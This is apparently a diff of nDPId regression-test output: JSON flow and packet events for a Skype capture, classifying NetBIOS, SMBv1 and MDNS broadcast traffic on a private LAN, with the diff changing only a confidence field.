00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431970642412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1431970642412,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARtFGRXKFgAAAAAEAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAEAA\/SAAAaAAMCoAQE="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1431970642413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1431970642413,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARnhKRXGFgAAAAAEAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAEAA\/SAAAYAAMCoAQE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431970642414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970642414,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKa30AAEARijTAqAEiwKgB\/wCKAIoAtudmEQJFcMCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAG9FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRuRQAA"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431970642417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1431970642417,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKmzEAoqm8CoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFuRQAAQUxJQ0VHQVRFAA=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1431970642418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642418,"pkt":"0NQSxnP1PBXCt3IOCABFAABOXUsAAEARmeDAqAEiwKgBAQCJAIkAOtIRRXgAAAABAAAAAAAAIEVCRU1FSkVERUZFSEVCRkVFRkNBQ0FDQUNBQ0FDQUNBAAAhAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431970643669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970643669,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOBnEAAEAR74LAqAFcwKgB\/wCJAIkAOrExRg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAADKWJAAAEARnOfAqAFcwKgB\/wCKAIoAtjdgEQJGDcCoAVwAAACgAAAgRU1GRkVERUJGRENORUpFTkVCRURDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAACwUAAAxGEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQQLRgAA"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOJN8AAEAR0RTAqAFcwKgB\/9JCAIkAOpbmnKMBEAABAAAAAAAAIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1431970643673,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970643673,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKHC4AAEAR2YPAqAEiwKgB\/wCKAIoAtt1hEQJFdcCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAHRFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRzRQAA"} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1431970643676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1431970643676,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKSxEAoqncCoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFzRQAAQUxJQ0VHQVRFAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431970643964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1431970643964,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NACoR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqSjYAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431970644120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1431970644120,"pkt":"PBXCt3IOxCwDBkn+CABFAACAhzsAAP8RkTHAqAFc4AAA+xTpFOkAbM4wAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxiwD\/\/4GSf7ADAABgAEAAAB4AATAqAFcwAwAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/g=="} -00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1431970644121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1431970644121,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAGwR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsYIEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/sAMAAGAAQAAAHgABMCoAVzADAAcgAEAAAB4ABD+gAAAAAAAAMYsA\/\/+Bkn+"} -00704{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00704{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 